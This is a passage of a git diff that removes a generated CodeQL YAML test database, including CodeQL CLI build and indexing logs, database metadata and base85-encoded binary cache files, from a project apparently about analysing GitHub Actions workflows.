Accepted values are 'gzip' (the default, to write gzip-compressed TRAP) and 'none' (to write uncompressed TRAP).\n", - "type" : "string", - "pattern" : "^(none|gzip)$" - } - } - } - } - } - ] - } - } -[2024-02-03 10:17:54] [PROGRESS] database init> Calculating baseline information in /Users/pwntester/seclab/projects/actions/codeql-actions/ql/lib/test -[2024-02-03 10:17:54] [SPAMMY] database init> Ignoring the following directories when processing baseline information: .git, .hg, .svn. -[2024-02-03 10:17:54] [DETAILS] database init> Running command in /Users/pwntester/seclab/projects/actions/codeql-actions/ql/lib/test: /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/tools/osx64/scc --by-file --exclude-dir .git,.hg,.svn --format json --no-large --no-min . -[2024-02-03 10:17:54] [PROGRESS] database init> Calculated baseline information for languages: (53ms). -[2024-02-03 10:17:54] [PROGRESS] database init> Resolving extractor yaml. -[2024-02-03 10:17:54] [DETAILS] database init> Found candidate extractor root for yaml: /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/yaml. -[2024-02-03 10:17:54] [PROGRESS] database init> Successfully loaded extractor YAML (yaml) from /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/yaml. -[2024-02-03 10:17:54] [PROGRESS] database init> Created skeleton CodeQL database at /Users/pwntester/seclab/projects/actions/codeql-actions/ql/lib/test-db. This in-progress database is ready to be populated by an extractor. -[2024-02-03 10:17:54] Plumbing command codeql database init completed. 
-[2024-02-03 10:17:54] [PROGRESS] database create> Running build command: [] -[2024-02-03 10:17:54] Running plumbing command: codeql database trace-command --working-dir=/Users/pwntester/seclab/projects/actions/codeql-actions/ql/lib/test --index-traceless-dbs --no-db-cluster -- /Users/pwntester/seclab/projects/actions/codeql-actions/ql/lib/test-db -[2024-02-03 10:17:54] Using autobuild script /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/yaml/tools/autobuild.sh. -[2024-02-03 10:17:54] [PROGRESS] database trace-command> Running command in /Users/pwntester/seclab/projects/actions/codeql-actions/ql/lib/test: [/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/yaml/tools/autobuild.sh] -[2024-02-03 10:17:55] [build-stderr] Scanning for files in /Users/pwntester/seclab/projects/actions/codeql-actions/ql/lib/test... -[2024-02-03 10:17:55] [build-stderr] /Users/pwntester/seclab/projects/actions/codeql-actions/ql/lib/test-db: Indexing files in in /Users/pwntester/seclab/projects/actions/codeql-actions/ql/lib/test... -[2024-02-03 10:17:55] [build-stderr] Running command in /Users/pwntester/seclab/projects/actions/codeql-actions/ql/lib/test: [/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/yaml/tools/index-files.sh, /Users/pwntester/seclab/projects/actions/codeql-actions/ql/lib/test-db/working/files-to-index13033409879197263775.list] -[2024-02-03 10:17:55] Plumbing command codeql database trace-command completed. -[2024-02-03 10:17:55] [PROGRESS] database create> Finalizing database at /Users/pwntester/seclab/projects/actions/codeql-actions/ql/lib/test-db. -[2024-02-03 10:17:55] Running plumbing command: codeql database finalize --mode=trim --no-db-cluster -- /Users/pwntester/seclab/projects/actions/codeql-actions/ql/lib/test-db -[2024-02-03 10:17:55] [PROGRESS] database finalize> Running TRAP import for CodeQL database at /Users/pwntester/seclab/projects/actions/codeql-actions/ql/lib/test-db... 
-[2024-02-03 10:17:55] Running plumbing command: codeql dataset import --dbscheme=/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/yaml/yaml.dbscheme -- /Users/pwntester/seclab/projects/actions/codeql-actions/ql/lib/test-db/db-yaml /Users/pwntester/seclab/projects/actions/codeql-actions/ql/lib/test-db/trap/yaml -[2024-02-03 10:17:55] Clearing disk cache since the version file /Users/pwntester/seclab/projects/actions/codeql-actions/ql/lib/test-db/db-yaml/default/cache/version does not exist -[2024-02-03 10:17:55] Tuple pool not found. Clearing relations with cached strings -[2024-02-03 10:17:55] Trimming disk cache at /Users/pwntester/seclab/projects/actions/codeql-actions/ql/lib/test-db/db-yaml/default/cache in mode clear. -[2024-02-03 10:17:55] Sequence stamp origin is -6222583512417648685 -[2024-02-03 10:17:55] Pausing evaluation to hard-clear memory at sequence stamp o+0 -[2024-02-03 10:17:55] Unpausing evaluation -[2024-02-03 10:17:55] Pausing evaluation to quickly trim disk at sequence stamp o+1 -[2024-02-03 10:17:55] Unpausing evaluation -[2024-02-03 10:17:55] Pausing evaluation to zealously trim disk at sequence stamp o+2 -[2024-02-03 10:17:55] Unpausing evaluation -[2024-02-03 10:17:55] Trimming completed (7ms): Purged everything. -[2024-02-03 10:17:55] Scanning for files in /Users/pwntester/seclab/projects/actions/codeql-actions/ql/lib/test-db/trap/yaml -[2024-02-03 10:17:55] Found 2 TRAP files (2.87 KiB) -[2024-02-03 10:17:55] [PROGRESS] dataset import> Importing TRAP files -[2024-02-03 10:17:55] Importing test.yml.trap.gz (1 of 2) -[2024-02-03 10:17:55] Importing sourceLocationPrefix.trap.gz (2 of 2) -[2024-02-03 10:17:55] [PROGRESS] dataset import> Merging relations -[2024-02-03 10:17:55] Merging 1 fragment for 'files'. -[2024-02-03 10:17:55] Merged 8 bytes for 'files'. -[2024-02-03 10:17:55] Merging 1 fragment for 'folders'. -[2024-02-03 10:17:55] Merged 80 bytes for 'folders'. 
-[2024-02-03 10:17:55] Merging 1 fragment for 'containerparent'. -[2024-02-03 10:17:55] Merged 80 bytes for 'containerparent'. -[2024-02-03 10:17:55] Merging 1 fragment for 'yaml_scalars'. -[2024-02-03 10:17:55] Merged 552 bytes for 'yaml_scalars'. -[2024-02-03 10:17:55] Merging 1 fragment for 'yaml'. -[2024-02-03 10:17:55] Merged 1416 bytes (1.38 KiB) for 'yaml'. -[2024-02-03 10:17:55] Merging 1 fragment for 'locations_default'. -[2024-02-03 10:17:55] Merged 1416 bytes (1.38 KiB) for 'locations_default'. -[2024-02-03 10:17:55] Merging 1 fragment for 'yaml_locations'. -[2024-02-03 10:17:55] Merged 472 bytes for 'yaml_locations'. -[2024-02-03 10:17:55] Merging 1 fragment for 'sourceLocationPrefix'. -[2024-02-03 10:17:55] Merged 4 bytes for 'sourceLocationPrefix'. -[2024-02-03 10:17:55] Saving string and id pools to disk. -[2024-02-03 10:17:55] Finished importing TRAP files. -[2024-02-03 10:17:55] Read 13.45 KiB of uncompressed TRAP data. -[2024-02-03 10:17:55] Relation data size: 3.93 KiB (merge rate: 52.86 KiB/s) -[2024-02-03 10:17:55] String pool size: 2.05 MiB -[2024-02-03 10:17:55] ID pool size: 1.03 MiB -[2024-02-03 10:17:55] [PROGRESS] dataset import> Finished writing database (relations: 3.93 KiB; string pool: 2.05 MiB). -[2024-02-03 10:17:55] Pausing evaluation to close the cache at sequence stamp o+3 -[2024-02-03 10:17:55] The disk cache is freshly trimmed; leave it be. -[2024-02-03 10:17:55] Unpausing evaluation -[2024-02-03 10:17:55] Plumbing command codeql dataset import completed. -[2024-02-03 10:17:55] [PROGRESS] database finalize> TRAP import complete (447ms). -[2024-02-03 10:17:55] Running plumbing command: codeql database cleanup --mode=trim -- /Users/pwntester/seclab/projects/actions/codeql-actions/ql/lib/test-db -[2024-02-03 10:17:56] [PROGRESS] database cleanup> Cleaning up existing TRAP files after import... -[2024-02-03 10:17:56] [PROGRESS] database cleanup> TRAP files cleaned up (4ms). 
-[2024-02-03 10:17:56] [PROGRESS] database cleanup> Cleaning up scratch directory...
-[2024-02-03 10:17:56] [PROGRESS] database cleanup> Scratch directory cleaned up (1ms).
-[2024-02-03 10:17:56] Running plumbing command: codeql dataset cleanup --mode=trim -- /Users/pwntester/seclab/projects/actions/codeql-actions/ql/lib/test-db/db-yaml
-[2024-02-03 10:17:56] [PROGRESS] dataset cleanup> Cleaning up dataset in /Users/pwntester/seclab/projects/actions/codeql-actions/ql/lib/test-db/db-yaml.
-[2024-02-03 10:17:56] Trimming disk cache at /Users/pwntester/seclab/projects/actions/codeql-actions/ql/lib/test-db/db-yaml/default/cache in mode trim.
-[2024-02-03 10:17:56] Sequence stamp origin is -6222583510647662597
-[2024-02-03 10:17:56] Pausing evaluation to zealously trim disk at sequence stamp o+0
-[2024-02-03 10:17:56] Unpausing evaluation
-[2024-02-03 10:17:56] Trimming completed (3ms): Trimmed disposable data from cache.
-[2024-02-03 10:17:56] Pausing evaluation to close the cache at sequence stamp o+1
-[2024-02-03 10:17:56] The disk cache is freshly trimmed; leave it be.
-[2024-02-03 10:17:56] Unpausing evaluation
-[2024-02-03 10:17:56] [PROGRESS] dataset cleanup> Trimmed disposable data from cache.
-[2024-02-03 10:17:56] [PROGRESS] dataset cleanup> Finalizing dataset in /Users/pwntester/seclab/projects/actions/codeql-actions/ql/lib/test-db/db-yaml
-[2024-02-03 10:17:56] [DETAILS] dataset cleanup> Finished deleting ID pool from /Users/pwntester/seclab/projects/actions/codeql-actions/ql/lib/test-db/db-yaml (5ms).
-[2024-02-03 10:17:56] Plumbing command codeql dataset cleanup completed.
-[2024-02-03 10:17:56] Plumbing command codeql database cleanup completed with status 0.
-[2024-02-03 10:17:56] [PROGRESS] database finalize> Finished zipping source archive (578.00 B).
-[2024-02-03 10:17:56] Plumbing command codeql database finalize completed.
-[2024-02-03 10:17:56] [PROGRESS] database create> Successfully created database at /Users/pwntester/seclab/projects/actions/codeql-actions/ql/lib/test-db.
-[2024-02-03 10:17:56] Terminating normally.
diff --git a/ql/lib/test-db/log/database-index-files-20240203.101755.239.log b/ql/lib/test-db/log/database-index-files-20240203.101755.239.log
deleted file mode 100644
index 858ec59a13d..00000000000
--- a/ql/lib/test-db/log/database-index-files-20240203.101755.239.log
+++ /dev/null
@@ -1,15 +0,0 @@
-[2024-02-03 10:17:55] This is codeql database index-files --include-extension=.yaml --include-extension=.yml --size-limit=5m --language=yaml /Users/pwntester/seclab/projects/actions/codeql-actions/ql/lib/test-db
-[2024-02-03 10:17:55] Log file was started late.
-[2024-02-03 10:17:55] Using index-files script /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/yaml/tools/index-files.sh.
-[2024-02-03 10:17:55] [PROGRESS] database index-files> Scanning for files in /Users/pwntester/seclab/projects/actions/codeql-actions/ql/lib/test...
-[2024-02-03 10:17:55] Calling plumbing command: codeql resolve files --include-extension=.yaml --include-extension=.yml --size-limit=5m /Users/pwntester/seclab/projects/actions/codeql-actions/ql/lib/test --format=json
-[2024-02-03 10:17:55] [PROGRESS] resolve files> Scanning /Users/pwntester/seclab/projects/actions/codeql-actions/ql/lib/test...
-[2024-02-03 10:17:55] Plumbing command codeql resolve files completed:
- [
- "/Users/pwntester/seclab/projects/actions/codeql-actions/ql/lib/test/test.yml"
- ]
-[2024-02-03 10:17:55] [DETAILS] database index-files> Found 1 files.
-[2024-02-03 10:17:55] [PROGRESS] database index-files> /Users/pwntester/seclab/projects/actions/codeql-actions/ql/lib/test-db: Indexing files in in /Users/pwntester/seclab/projects/actions/codeql-actions/ql/lib/test...
-[2024-02-03 10:17:55] Using index-files script /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/yaml/tools/index-files.sh.
-[2024-02-03 10:17:55] [PROGRESS] database index-files> Running command in /Users/pwntester/seclab/projects/actions/codeql-actions/ql/lib/test: [/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/yaml/tools/index-files.sh, /Users/pwntester/seclab/projects/actions/codeql-actions/ql/lib/test-db/working/files-to-index13033409879197263775.list]
-[2024-02-03 10:17:55] Terminating normally.
diff --git a/ql/lib/test-db/src.zip b/ql/lib/test-db/src.zip deleted file mode 100644 index 3dbf073c49924685cbbad30b59944af574c77ae9..0000000000000000000000000000000000000000 GIT binary patch literal 0 HcmV?d00001 literal 578 zcmWIWW@Zs#;Nak3unBUGU_b)iKz3+xYEiL%L3v(DYH>+wk$!P%a!z8BenC-wR%&ud zv3_E5NoIatv3_!XN@`(_E{t24qo0$Rqz}>rCiE(Eb6SH=7admM+4Ebw}@-&*HCX*mO-(<>9jurcV|DmT#ZViIkhd$??4S(D4@jEe#GH zLQ}rY-Mre`mRS<8;aoAyhp>O}l|q-Aya^WjAv z%^yDeS19qFwD3&e-ivQz|0Q-uY`&Q}r|!?E8*|RR+su$Qv0+zf@ZJtR^@49DGYywj zum^ava}-DO?zLiMVA#RLz!2cg$Rxsmh%{t5P^6&(Dn?;|H!B;+a7G}k1k#&<4q{*c E0HyckLI3~& diff --git a/ql/src/test-db/baseline-info.json b/ql/src/test-db/baseline-info.json deleted file mode 100644 index 9e26dfeeb6e..00000000000 --- a/ql/src/test-db/baseline-info.json +++ /dev/null @@ -1 +0,0 @@ -{} \ No newline at end of file diff --git a/ql/src/test-db/codeql-database.yml b/ql/src/test-db/codeql-database.yml deleted file mode 100644 index 1dedebb70be..00000000000 --- a/ql/src/test-db/codeql-database.yml +++ /dev/null @@ -1,10 +0,0 @@ ---- -sourceLocationPrefix: /Users/pwntester/seclab/projects/actions/codeql-actions/ql/src/test -baselineLinesOfCode: 0 -unicodeNewlines: false -columnKind: utf16 -primaryLanguage: yaml -creationMetadata: - cliVersion: 2.16.1 - creationTime: 2024-02-03T09:17:52.592220Z -finalised: true diff --git a/ql/src/test-db/db-yaml/default/cache/.lock b/ql/src/test-db/db-yaml/default/cache/.lock deleted file mode 100644 index e69de29bb2d..00000000000 diff --git a/ql/src/test-db/db-yaml/default/cache/cached-strings/pools/0/buckets/info b/ql/src/test-db/db-yaml/default/cache/cached-strings/pools/0/buckets/info deleted file mode 100644 index 0111728636533e2c31d7b0489e64f46bcd4d6cf2..0000000000000000000000000000000000000000 GIT binary patch literal 0 HcmV?d00001 literal 40 ecmZQz00Tw{#Q>$5|AY89zRa8gqUTSZdItbEj0T|q 
diff --git a/ql/src/test-db/db-yaml/default/cache/cached-strings/pools/0/buckets/page-000000 b/ql/src/test-db/db-yaml/default/cache/cached-strings/pools/0/buckets/page-000000 deleted file mode 100644 index 6d17cf9d15fb9f4a2358a2d079f3b8c755d005fa..0000000000000000000000000000000000000000 GIT binary patch literal 0 HcmV?d00001 literal 8192 zcmeIu0Sy2E0K%a6Pi+o2h(KY$fB^#r3>YwAz<>b*1`HT5V8DO@0|pEjFkrxd0RsjM GyblZ@00031 diff --git a/ql/src/test-db/db-yaml/default/cache/cached-strings/pools/0/ids1/info b/ql/src/test-db/db-yaml/default/cache/cached-strings/pools/0/ids1/info deleted file mode 100644 index 799471fd4d54d409c98d3b7826deaac67913dc99..0000000000000000000000000000000000000000 GIT binary patch literal 0 HcmV?d00001 literal 40 ecmZQz00Tw{#Q>!l|AY89zRa8gqGzYMJ_GYwAz<>b*1`HT5V8DO@0|pEjFkrxd0RsjM GyblZ@00031 diff --git a/ql/src/test-db/db-yaml/default/cache/cached-strings/pools/0/indices1/info b/ql/src/test-db/db-yaml/default/cache/cached-strings/pools/0/indices1/info deleted file mode 100644 index 799471fd4d54d409c98d3b7826deaac67913dc99..0000000000000000000000000000000000000000 GIT binary patch literal 0 HcmV?d00001 literal 40 ecmZQz00Tw{#Q>!l|AY89zRa8gqGzYMJ_GYwAz<>b*1`HT5V8DO@0|pEjFkrxd0RsjM GyblZ@00031 diff --git a/ql/src/test-db/db-yaml/default/cache/cached-strings/pools/0/info b/ql/src/test-db/db-yaml/default/cache/cached-strings/pools/0/info deleted file mode 100644 index 9c1ea6cdeb296b714876d0e928d9978e9ec788c9..0000000000000000000000000000000000000000 GIT binary patch literal 0 HcmV?d00001 literal 41 ZcmZQz00U+S1tA%s91sm=%ij{e1^@)e0qp<) diff --git a/ql/src/test-db/db-yaml/default/cache/cached-strings/pools/0/metadata/info b/ql/src/test-db/db-yaml/default/cache/cached-strings/pools/0/metadata/info deleted file mode 100644 index 9cdb710dfd9490f67f5103cbab69eb12829f96b4..0000000000000000000000000000000000000000 GIT binary patch literal 0 HcmV?d00001 literal 40 ecmZQz00Tw{#lZL<3PAiDUuI4L(W_e5uLA(d%ME}4 
diff --git a/ql/src/test-db/db-yaml/default/cache/cached-strings/pools/0/metadata/page-000000 b/ql/src/test-db/db-yaml/default/cache/cached-strings/pools/0/metadata/page-000000 deleted file mode 100644 index 6d17cf9d15fb9f4a2358a2d079f3b8c755d005fa..0000000000000000000000000000000000000000 GIT binary patch literal 0 HcmV?d00001 literal 8192 zcmeIu0Sy2E0K%a6Pi+o2h(KY$fB^#r3>YwAz<>b*1`HT5V8DO@0|pEjFkrxd0RsjM GyblZ@00031 
diff --git a/ql/src/test-db/db-yaml/default/cache/cached-strings/pools/0/pageDump/page-000000000 b/ql/src/test-db/db-yaml/default/cache/cached-strings/pools/0/pageDump/page-000000000 deleted file mode 100644 index 7bccaeb20c898fd660036bab54ae98c20280d0a3..0000000000000000000000000000000000000000 GIT binary patch literal 0 HcmV?d00001 literal 1048592 zcmeIuF%bYT48*X95C8>I#^n|iy>Q4V1Mr|k1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+ z009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBly zK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF z5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk z1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs z0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZ zfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&U zAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C7 z2oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N z0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+ z009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBly zK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF z5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk z1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs z0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZ zfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&U zAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C7 z2oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N z0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+ z009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBly zK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF z5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk z1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs z0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZ 
zfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&U zAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C7 z2oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N z0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+ z009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBly zK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF z5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk z1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs z0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZ zfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&U zAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C7 z2oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N z0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+ z009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBly zK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF z5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk z1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs z0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZ zfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&U zAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C7 z2oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N z0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+ z009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBly zK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF z5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk z1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs z0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZ zfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&U zAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C7 
z2oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N z0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+ z009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBly zK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF z5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk z1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs z0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZ zfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&U zAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C7 z2oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N z0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+ z009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBly zK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF z5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk z1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs z0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZ zfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&U zAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C7 z2oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N z0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+ z009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBly zK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF z5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk z1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs z0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZ zfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&U zAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C7 z2oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N z0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+ 
z009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBly zK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF z5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk z1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs z0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZ zfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&U iAV7cs0RjXF5FkK+009C72oNAZfB=C7fl5x_H>VE`i2?Qi diff --git a/ql/src/test-db/db-yaml/default/cache/cached-strings/pools/poolInfo b/ql/src/test-db/db-yaml/default/cache/cached-strings/pools/poolInfo deleted file mode 100644 index d14fdc5df9e27d6e8465f5feee0cd63125b6c0c2..0000000000000000000000000000000000000000 GIT binary patch literal 0 HcmV?d00001 literal 28 TcmZQz00Slng&^}g^^O4m1iu0A diff --git a/ql/src/test-db/db-yaml/default/cache/cached-strings/tuple-pool/header b/ql/src/test-db/db-yaml/default/cache/cached-strings/tuple-pool/header deleted file mode 100644 index fde1ac19d2b083530bcab4cb4fd2dcaa285234ab..0000000000000000000000000000000000000000 GIT binary patch literal 0 HcmV?d00001 literal 4 LcmZQzU|N8l!2HLh-`p#3Y2XNq&Gp?c0l?zlx+`Grw3&_0NE3vY)2sb7L@J8 Rz`z934>Hpk$nJ%*T>#m>2kQU; diff --git a/ql/src/test-db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#Cfg#843d753d--Make-Locations#e31d5b03--Location-Cfg#f90a6699--Implementation---Cached--TNode-56603d11#2#e b/ql/src/test-db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#Cfg#843d753d--Make-Locations#e31d5b03--Location-Cfg#f90a6699--Implementation---Cached--TNode-56603d11#2#e deleted file mode 100644 index aa6e82a1af6251f999da1af2e24d6aa1a2d5e799..0000000000000000000000000000000000000000 GIT binary patch literal 0 HcmV?d00001 literal 80 zcmZQzU|{$?SD_V1DKjuI8UyJRAZ-GqHvwr=AblH1n*p&N5Ss(>L?E^R;#)v$$-uy5 N3#6@pbT5#$1^|N{2($nI 
